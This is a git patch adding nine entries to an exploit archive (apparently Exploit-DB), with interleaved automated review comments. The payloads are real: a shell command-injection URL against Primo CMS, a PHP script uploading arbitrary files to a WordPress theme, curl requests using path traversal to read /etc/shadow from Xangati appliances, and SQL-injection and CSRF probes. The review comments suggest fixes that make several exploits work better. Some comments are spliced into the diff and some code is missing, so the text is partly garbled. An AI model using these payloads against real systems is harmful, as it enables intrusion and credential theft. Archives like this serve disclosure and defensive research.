From f89cce16df92df06a527aa75033e62a78914fd4f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 1 Jan 2016 05:03:26 +0000 Subject: [PATCH] DB: 2016-01-01 9 new exploits --- files.csv | 13 +++++++++++-- platforms/cgi/webapps/39137.txt | 9 +++++++++ platforms/hardware/remote/39138.html | 19 +++++++++++++++++++ platforms/jsp/webapps/39142.txt | 23 +++++++++++++++++++++++ platforms/jsp/webapps/39143.txt | 12 ++++++++++++ platforms/linux/local/411.c | 6 +++--- platforms/php/webapps/39135.php | 21 +++++++++++++++++++++ platforms/php/webapps/39136.txt | 9 +++++++++ platforms/php/webapps/39139.txt | 10 ++++++++++ platforms/php/webapps/39140.txt | 7 +++++++ platforms/php/webapps/39141.txt | 7 +++++++ 11 files changed, 131 insertions(+), 5 deletions(-) create mode 100755 platforms/cgi/webapps/39137.txt create mode 100755 platforms/hardware/remote/39138.html create mode 100755 platforms/jsp/webapps/39142.txt create mode 100755 platforms/jsp/webapps/39143.txt create mode 100755 platforms/php/webapps/39135.php create mode 100755 platforms/php/webapps/39136.txt create mode 100755 platforms/php/webapps/39139.txt create mode 100755 platforms/php/webapps/39140.txt create mode 100755 platforms/php/webapps/39141.txt diff --git a/files.csv b/files.csv index c5c5f0382..ccf7bf2c0 100755 --- a/files.csv +++ b/files.csv 
@@ -382,7 +382,7 @@ id,file,description,date,author,platform,type,port
 407,platforms/cgi/webapps/407.txt,"AWStats (5.0-6.3) Input Validation Hole in 'logfile'",2004-08-21,"Johnathan Bat",cgi,webapps,0
 408,platforms/linux/remote/408.c,"Qt BMP Parsing Bug Heap Overflow Exploit",2004-08-21,infamous41md,linux,remote,0
 409,platforms/bsd/remote/409.c,"BSD (telnetd) Remote Root Exploit",2001-06-09,Teso,bsd,remote,23
-411,platforms/linux/local/411.c,"Sendmail 8.11.x Exploit (i386-Linux)",2001-01-01,sd,linux,local,0
+411,platforms/linux/local/411.c,"Sendmail 8.11.x - Exploit (i386-Linux)",2001-01-01,sd,linux,local,0
 413,platforms/linux/remote/413.c,"MusicDaemon <= 0.0.3 - Remote DoS and /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0
 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection Vulnerability",2004-08-25,"Serkan Akpolat",linux,remote,0
 417,platforms/linux/local/417.c,"SquirrelMail (chpasswd) Local Root Bruteforce Exploit",2004-08-25,Bytes,linux,local,0
@@ -14526,7 +14526,7 @@ id,file,description,date,author,platform,type,port
 16721,platforms/windows/remote/16721.rb,"FileWrangler 5.30 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0
 16722,platforms/windows/remote/16722.rb,"Xlink FTP Client Buffer Overflow",2010-11-11,metasploit,windows,remote,0
 16723,platforms/windows/remote/16723.rb,"Vermillion FTP Daemon PORT Command Memory Corruption",2010-09-20,metasploit,windows,remote,0
-16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 Username Overflow",2010-07-03,metasploit,windows,remote,0
+16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - Username Overflow",2010-07-03,metasploit,windows,remote,0
 16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD)",2010-11-14,metasploit,windows,remote,0
 16726,platforms/windows/remote/16726.rb,"FTPPad 1.2.0 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0
 16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve FTP PORT Buffer Overflow",2010-04-30,metasploit,windows,remote,5554
@@ -35383,3 +35383,12 @@ id,file,description,date,author,platform,type,port
 39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0
 39133,platforms/php/webapps/39133.php,"Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80
 39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Local Root Vulnerability",2015-12-30,"Larry W. Cashdollar",linux,local,0
+39135,platforms/php/webapps/39135.php,"WordPress Felici Theme 'uploadify.php' Arbitrary File Upload Vulnerability",2014-03-23,"CaFc Versace",php,webapps,0
+39136,platforms/php/webapps/39136.txt,"Symphony <= 2.2.4 Cross Site Request Forgery Vulnerability",2014-03-24,"High-Tech Bridge",php,webapps,0
+39137,platforms/cgi/webapps/39137.txt,"Primo Interactive CMS 'pcm.cgi' Remote Command Execution Vulnerability",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps,0
+39138,platforms/hardware/remote/39138.html,"ICOMM 610 Wireless Modem Cross Site Request Forgery Vulnerability",2014-04-12,"Blessen Thomas",hardware,remote,0
+39139,platforms/php/webapps/39139.txt,"PHPFox Access Control Security Bypass Vulnerability",2014-04-05,"Wesley Henrique",php,webapps,0
+39140,platforms/php/webapps/39140.txt,"Joomla! Inneradmission Component 'index.php' SQL Injection Vulnerability",2014-04-08,Lazmania61,php,webapps,0
+39141,platforms/php/webapps/39141.txt,"eazyCMS 'index.php' SQL Injection Vulnerability",2014-04-09,Renzi,php,webapps,0
+39142,platforms/jsp/webapps/39142.txt,"Xangati /servlet/MGConfigData Multiple Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
+39143,platforms/jsp/webapps/39143.txt,"Xangati /servlet/Installer file Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
diff --git a/platforms/cgi/webapps/39137.txt b/platforms/cgi/webapps/39137.txt
new file mode 100755
index 000000000..a7ce061fa
--- /dev/null
+++ b/platforms/cgi/webapps/39137.txt
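Review bot: The new 39136 row indexes the Symphony CSRF as `Symphony <= 2.2.4`, but the file it points at (39136.txt, added in this same commit) says "Symphony version 2.3.1 and prior are vulnerable"; one of the two is wrong, and since the CSV is what searches return, reconcile it against the BID 66536 source before this lands. The same commit normalises two older titles to the `Product Version - Description` form (the 411 and 16724 hunks above) while the nine new rows keep raw SecurityFocus wording with no separator and, in most cases, no version; applying the same form here, e.g. `WordPress Felici Theme 1.7 - 'uploadify.php' Arbitrary File Upload`, would keep the index consistent and carry the version the description text already states.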
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/66549/info
+
+Primo Interactive CMS is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
+
+Primo Interactive CMS 6.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi-bin/pcm.cgi?download=;id|
\ No newline at end of file
diff --git a/platforms/hardware/remote/39138.html b/platforms/hardware/remote/39138.html
new file mode 100755
index 000000000..3f1c734a2
--- /dev/null
+++ b/platforms/hardware/remote/39138.html
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/66593/info
+
+ICOMM 610 is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
+
+ICOMM 610 01.01.08.991 and prior are vulnerable.
+
+
+
+
+
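Review bot: The PoC `http://www.example.com/cgi-bin/pcm.cgi?download=;id|` never says what a successful response looks like, so a tester has no way to tell a working injection from a 500 page; add a line such as `Success: the response body contains the output of id (uid=... gid=...).` The `;`…`|` framing only makes sense if `download` is interpolated unquoted into a shell command line (presumably the script shells out to serve the requested file — not shown here), and the prose should say that rather than the generic "fails to sufficiently sanitize", because it tells a defender exactly what to grep the CGI for. The entry also carries no indication of whether `pcm.cgi` is reachable pre-authentication, which is the single fact that decides severity for a CMS RCE.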
+
+
+
+
+
+
+
diff --git a/platforms/jsp/webapps/39142.txt b/platforms/jsp/webapps/39142.txt
new file mode 100755
index 000000000..e2417892d
--- /dev/null
+++ b/platforms/jsp/webapps/39142.txt
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/66817/info
+
+Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.
+
+A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.
+
+Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
+
+curl -i -s -k -X 'POST' \
+-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
+--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \
+'hxxps://www.example.com/servlet/MGConfigData'
+
+POST /servlet/MGConfigData HTTP/1.1
+key=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=www.example.com
+
+POST /servlet/MGConfigData HTTP/1.1
+key=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=www.example.com
+
+curl -i -s -k -X 'POST' \
+-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
+--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow' \
+'hxxps://www.example.com/servlet/MGConfigData'
\ No newline at end of file
diff --git a/platforms/jsp/webapps/39143.txt b/platforms/jsp/webapps/39143.txt
new file mode 100755
index 000000000..aefaac0b0
--- /dev/null
+++ b/platforms/jsp/webapps/39143.txt
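Review bot: Lines 8–19 of the new 39138.html are empty in this rendering, so the HTML form that is the actual CSRF proof — target URL on the modem, method, parameter names and values — cannot be reviewed here; if that is an extraction artifact the file is fine, but if the form really is missing the entry documents nothing beyond the BID summary and should be restored from BID 66593. Independently of the form, the prose should name the action the forged request performs and the endpoint it hits, since "certain unauthorized actions" gives a defender nothing to look for; something like `The form below submits a POST to the modem's administration page that changes <setting> without any anti-CSRF token; an authenticated admin who loads it has the change applied.` Also say whether the device relies on a session cookie alone (which is what makes the forgery work) so the remediation advice — add a synchroniser token or Origin/Referer check — follows from the text.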
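Review bot: The four requests disagree on whether authentication is needed and the prose does not resolve it: the first `getUpgradeStatus` request sends `key=foo`, an obvious placeholder, while the `download`, `port_svc` and `binfile` requests send `key=validkey`, which reads as a real session key being required. That is the difference between a pre-auth and a post-auth arbitrary file read and should be stated explicitly, e.g. `The getUpgradeStatus handler does not validate the key parameter; the remaining vectors require a valid key obtained by logging in.` — or corrected if `foo` was a typo. `hxxps://` is a defanged scheme that curl will reject, and `User-Agent: Java/1.7.0_25` appears to mimic the product's own client; say whether the servlet actually checks either so a tester knows which pieces of the request are load-bearing. `-k` disables certificate verification, which is fine for a PoC against a lab appliance but worth a one-word note.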
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/66817/info
+
+Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.
+
+A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.
+
+Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
+
+curl -i -s -k -X 'POST' \
+-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
+--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
+'hxxps://www.example.com/servlet/Installer'
\ No newline at end of file
diff --git a/platforms/linux/local/411.c b/platforms/linux/local/411.c
index 4b40827ea..33df094d0 100755
--- a/platforms/linux/local/411.c
+++ b/platforms/linux/local/411.c
@@ -399,6 +399,6 @@ int main(int argc, char *argv[])
 /* That's all. */
-
-
-// milw0rm.com [2001-01-01]
+
+
+// milw0rm.com [2001-01-01]
diff --git a/platforms/php/webapps/39135.php b/platforms/php/webapps/39135.php
new file mode 100755
index 000000000..d1f20d7e9
--- /dev/null
+++ b/platforms/php/webapps/39135.php
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/66490/info
+
+The Felici theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.
+
+Felici 1.7 is vulnerable; other versions may also be affected.
+
+"@$uploadfile",
+'folder'=>'/wp-content/plugins/custom-background/uploadify/'));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+?>
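Review bot: The PoC reads `/etc/shadow`, which only succeeds if the servlet container runs as root; against a non-root Tomcat a traversal that genuinely works returns an empty or error response, and a tester would wrongly conclude the appliance is patched. Probe with a world-readable file first and say so in the prose, e.g. `file=%2Ffloodguard%2F../../../../../../../../../etc/passwd`, and state what success looks like (file contents in the body of a `200` response) so the result is unambiguous. As in 39142 the request hard-codes `key=validkey` and a defanged `hxxps://` scheme without saying where the key comes from; one sentence on whether `/servlet/Installer` with `falconConfig=getfile` checks the key at all would settle pre-auth versus post-auth for this vector.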
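Review bot: The upload uses the legacy `'Filedata' => "@$uploadfile"` form, which no current PHP honours: since 5.6 `CURLOPT_SAFE_UPLOAD` defaults to true so the `@…` string is posted literally, and PHP 7 removed the `@` form outright, so the script silently sends no file. Use `'Filedata' => new CURLFile($uploadfile)` (available from PHP 5.5) instead, or for 5.5-only interpreters set `curl_setopt($ch, CURLOPT_SAFE_UPLOAD, false);` before `curl_exec`. The posted `folder` is `/wp-content/plugins/custom-background/uploadify/`, i.e. the vulnerable `uploadify.php` appears to live in a plugin bundled with the theme rather than in the theme itself — presumably a site carrying that plugin without Felici is just as exposed, and the prose should say which component the fix applies to. The lines between the prose and `"@$uploadfile",` (the `<?php` opener and the `curl_init`/`CURLOPT_POSTFIELDS` setup, presumably) are not visible in this rendering.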
diff --git a/platforms/php/webapps/39136.txt b/platforms/php/webapps/39136.txt
new file mode 100755
index 000000000..22ff890d1
--- /dev/null
+++ b/platforms/php/webapps/39136.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/66536/info
+
+Symphony is prone to a cross-site request-forgery vulnerability.
+
+An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
+
+Symphony version 2.3.1 and prior are vulnerable.
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/39139.txt b/platforms/php/webapps/39139.txt
new file mode 100755
index 000000000..07c3cab12
--- /dev/null
+++ b/platforms/php/webapps/39139.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/66677/info
+
+PHPFox is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.
+
+Attackers can leverage this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.
+
+PHPFox 3.7.3, 3.7.4 and 3.7.5 are vulnerable
+
+&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7
+&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0 val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!& core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290
\ No newline at end of file
diff --git a/platforms/php/webapps/39140.txt b/platforms/php/webapps/39140.txt
new file mode 100755
index 000000000..66fc4e02d
--- /dev/null
+++ b/platforms/php/webapps/39140.txt
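Review bot: The proof is absent: the final line of the new 39136.txt (line 9 of the hunk) is empty in this rendering, so there is no request, form or endpoint to evaluate, and the prose never names which Symphony action is forgeable. If the PoC was an HTML form it has been lost and should be restored from BID 66536; as it stands the entry should at least state the affected page and the effect of a forged request, e.g. `A logged-in administrator who visits an attacker page is made to submit <action> to /symphony/<page> because the request carries no anti-CSRF token.` The sibling entry 39138 in this commit keeps its form in an `.html` file; if a form is restored here the same extension would keep the two consistent.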
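Review bot: The PoC body on the last line of 39139.txt is not a usable request: there is a space where `&` is required before `val[default_feed_value]`, a stray space after `AQUI!!!!!!!!!!!&`, and the string starts with `&` but the endpoint and method it is posted to are never given (presumably phpFox's AJAX handler — not shown). `core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7` is a per-session value that has to be taken from the attacker's own logged-in session, and the record should say so rather than ship one fixed token. Most importantly the prose says only "perform actions without proper authorization"; from the parameters the bypass looks like posting a `comment.add` onto item `27` on profile user `290` as a user who should not be able to, and if that is what was observed it should be stated — `A low-privileged user can add comments to another user's status (item_id) by supplying that user's profile_user_id.` — so a reader can judge severity.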
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/66708/info
+
+Inneradmission component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_inneradmission&id=1'a
\ No newline at end of file
diff --git a/platforms/php/webapps/39141.txt b/platforms/php/webapps/39141.txt
new file mode 100755
index 000000000..256289526
--- /dev/null
+++ b/platforms/php/webapps/39141.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/66769/info
+
+eazyCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?tab=[SQLI]
\ No newline at end of file
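Review bot: `id=1'a` in the 39140.txt PoC is only an error probe — a stray quote — and the entry records neither the response it produced nor the Inneradmission version tested, so nothing here distinguishes an SQL syntax error from a generic 500 page. Add the observed evidence (the database error text, or a true/false pair of requests that return different pages) and the component version; every other new entry in this commit states at least a version, and this one states none, which also explains the version-less title in files.csv.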
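Review bot: `index.php?tab=[SQLI]` in 39141.txt is a placeholder, not a proof, and no eazyCMS version is given — the only concrete fact in the file is the BID URL. Record the payload that was actually observed to inject and the response that demonstrated it, plus the version tested, e.g. `eazyCMS <version>: index.php?tab=1' returns <database error>`; without that the entry can neither be reproduced nor retired when a fix ships.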